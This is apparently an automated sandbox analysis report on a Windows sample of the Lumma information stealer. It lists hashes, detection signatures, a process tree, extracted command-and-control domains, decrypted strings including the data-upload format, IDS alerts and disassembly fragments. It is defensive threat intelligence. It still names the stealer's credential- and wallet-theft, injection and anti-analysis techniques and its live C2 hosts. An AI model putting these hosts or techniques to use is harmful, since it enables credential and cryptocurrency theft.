Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
R3nz_Loader.exe

Overview

General Information

Sample name:R3nz_Loader.exe
Analysis ID:1582077
MD5:b43d8eca7777b170ddc40a824ab10bb6
SHA1:a7da0bbde621a7df3489b394ee4e5cea963225e6
SHA256:1db1a4c253278293c863dff9759c6577f1b6b5b8f69ac0c612338453eeea96d9
Tags:exeuser-JaffaCakes118
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • R3nz_Loader.exe (PID: 2684 cmdline: "C:\Users\user\Desktop\R3nz_Loader.exe" MD5: B43D8ECA7777B170DDC40A824AB10BB6)
    • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 5780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 2676 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop", "wholersorie.shop", "fancywaxxers.shop", "abruptyopsn.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop"], "Build id": "BVnUqo--@youngesstt"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000003.00000003.2082382204.0000000002AE8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: R3nz_Loader.exe PID: 2684JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Click to see the 5 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                3.2.aspnet_regiis.exe.2760000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  0.2.R3nz_Loader.exe.6cf01000.5.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                    0.2.R3nz_Loader.exe.6cf01000.5.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                      0.2.R3nz_Loader.exe.6cee0000.4.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                        0.2.R3nz_Loader.exe.a10000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                          Sigma Signatures

                          No Sigma rule has matched

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-29T23:36:55.447181+010020283713Unknown Traffic192.168.2.549704104.21.32.1443TCP
                          2024-12-29T23:36:56.516425+010020283713Unknown Traffic192.168.2.549705104.21.32.1443TCP
                          2024-12-29T23:36:57.936435+010020283713Unknown Traffic192.168.2.549707104.21.32.1443TCP
                          2024-12-29T23:36:59.137265+010020283713Unknown Traffic192.168.2.549709104.21.32.1443TCP
                          2024-12-29T23:37:00.850104+010020283713Unknown Traffic192.168.2.549714104.21.32.1443TCP
                          2024-12-29T23:37:02.386572+010020283713Unknown Traffic192.168.2.549715104.21.32.1443TCP
                          2024-12-29T23:37:04.357809+010020283713Unknown Traffic192.168.2.549716104.21.32.1443TCP
                          2024-12-29T23:37:06.910342+010020283713Unknown Traffic192.168.2.549717104.21.32.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-29T23:36:55.916300+010020546531A Network Trojan was detected192.168.2.549704104.21.32.1443TCP
                          2024-12-29T23:36:56.980247+010020546531A Network Trojan was detected192.168.2.549705104.21.32.1443TCP
                          2024-12-29T23:37:07.362321+010020546531A Network Trojan was detected192.168.2.549717104.21.32.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-29T23:36:55.916300+010020498361A Network Trojan was detected192.168.2.549704104.21.32.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-29T23:36:56.980247+010020498121A Network Trojan was detected192.168.2.549705104.21.32.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-29T23:36:59.618823+010020480941Malware Command and Control Activity Detected192.168.2.549709104.21.32.1443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: https://fancywaxxers.shop/YBAvira URL Cloud: Label: malware
                          Source: rabidcowse.shopAvira URL Cloud: Label: malware
                          Source: wholersorie.shopAvira URL Cloud: Label: malware
                          Source: https://fancywaxxers.shop/api9BdAvira URL Cloud: Label: malware
                          Source: https://fancywaxxers.shop/api_Avira URL Cloud: Label: malware
                          Source: fancywaxxers.shopAvira URL Cloud: Label: malware
                          Source: https://fancywaxxers.shop/apiABAvira URL Cloud: Label: malware
                          Source: cloudewahsj.shopAvira URL Cloud: Label: malware
                          Source: https://fancywaxxers.shop/XAvira URL Cloud: Label: malware
                          Source: noisycuttej.shopAvira URL Cloud: Label: malware
                          Source: https://fancywaxxers.shop/int32Avira URL Cloud: Label: malware
                          Source: https://fancywaxxers.shop/apiAvira URL Cloud: Label: malware
                          Source: framekgirus.shopAvira URL Cloud: Label: malware
                          Source: nearycrepso.shopAvira URL Cloud: Label: malware
                          Source: https://fancywaxxers.shop/Avira URL Cloud: Label: malware
                          Source: https://fancywaxxers.shop/nAvira URL Cloud: Label: malware
                          Source: abruptyopsn.shopAvira URL Cloud: Label: malware
                          Source: tirepublicerj.shopAvira URL Cloud: Label: malware
                          Found malware configuration
                          Source: 3.2.aspnet_regiis.exe.2760000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop", "wholersorie.shop", "fancywaxxers.shop", "abruptyopsn.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop"], "Build id": "BVnUqo--@youngesstt"}
                          Multi AV Scanner detection for submitted file
                          Source: R3nz_Loader.exeReversingLabs: Detection: 34%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: R3nz_Loader.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: cloudewahsj.shop
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: rabidcowse.shop
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: noisycuttej.shop
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: tirepublicerj.shop
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: framekgirus.shop
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: wholersorie.shop
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: abruptyopsn.shop
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: nearycrepso.shop
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: fancywaxxers.shop
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                          Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmpString decryptor: BVnUqo--@youngesstt
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02775050 CryptUnprotectData,3_2_02775050
                          Source: R3nz_Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49704 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49707 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49714 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49715 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49716 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49717 version: TLS 1.2
                          Source: R3nz_Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012C1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\Desktop\R3nz_Loader.PDB source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012C1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: %%.pdb source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\user\Desktop\R3nz_Loader.PDB source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdb source: WER3C4D.tmp.dmp.6.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER3C4D.tmp.dmp.6.dr
                          Source: Binary string: n0C:\Windows\mscorlib.pdb source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbLL source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001339000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012EC000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001339000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb8 source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001326000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER3C4D.tmp.dmp.6.dr
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_6CEF4322 FindFirstFileExW,0_2_6CEF4322
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00A706A0
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h0_2_00A706A0
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+18h]0_2_00A45E50
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-0002D61Ah]0_2_00A71BB0
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h0_2_00A71BB0
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 4x nop then mov ecx, edi0_2_00A38F60
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh0_2_00A71960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+4F03650Ah]3_2_02785A60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_0276D3E9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], dx3_2_02775050
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [esi], ax3_2_0279D0CA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0278A8C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [ecx+ebx]3_2_0278208A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx3_2_0279B150
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, ebx3_2_0279B150
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_02782E78
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_0278BE6E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_027787FE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h3_2_0279FFB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax3_2_0276CFA8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h3_2_0279EC20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h3_2_0279EC20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h3_2_0279ED50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 6E87DD67h3_2_0278AD45
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+000001A4h]3_2_02769D30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax], bl3_2_0276DDBE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_02785210
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [ecx+eax+01h], 00000000h3_2_02787200
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h3_2_0279F340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+18h]3_2_027743D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, edx3_2_02769390
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000140h]3_2_02777828
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 7DA30DA1h3_2_02777828
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_027690B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_027950A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_02783890
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi]3_2_02783890
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx-20h]3_2_02783890
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, esi3_2_02783890
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_02783890
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, dword ptr [ebp-60h]3_2_02783890
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_02788890
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edi-73715825h]3_2_02776146
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then xor eax, eax3_2_02776146
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-0002D61Ah]3_2_027A0130
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h3_2_027A0130
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp dword ptr [027A5774h]3_2_0277712B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0278A90B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax-1B130B8Dh]3_2_0276B909
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_02787E5C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]3_2_0277E650
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp al, 2Eh3_2_02785E00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-0Fh]3_2_02785E00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh3_2_0279FEE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax3_2_0276A2B5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_0277B6CA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_0278B6B5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax3_2_0276A6AA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0Ah]3_2_0277BE80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp edx, esi3_2_02798770
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0278CF71
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0278CF71
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_02788748
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-000000A7h]3_2_02779720
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0278B710
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax3_2_0278B710
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp dword ptr [027A573Ch]3_2_02776FF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esp+02h], D264DC1Bh3_2_027877F3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax3_2_0279CFD9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, eax3_2_0279B7C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7F7BECC6h3_2_0279B7C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0278C78B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_0278C78B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0278C78B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx3_2_02787C36
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push eax3_2_0279C42E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]3_2_0279C42E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ebp-000000D4h]3_2_02783400
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_02789400
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_027984FF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push eax3_2_0279CCFF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, edi3_2_027674E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi-000000E6h]3_2_027815B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+02h]3_2_027815B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_027815B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+24h]3_2_02776D9A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0278A586

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.32.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.32.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49717 -> 104.21.32.1:443
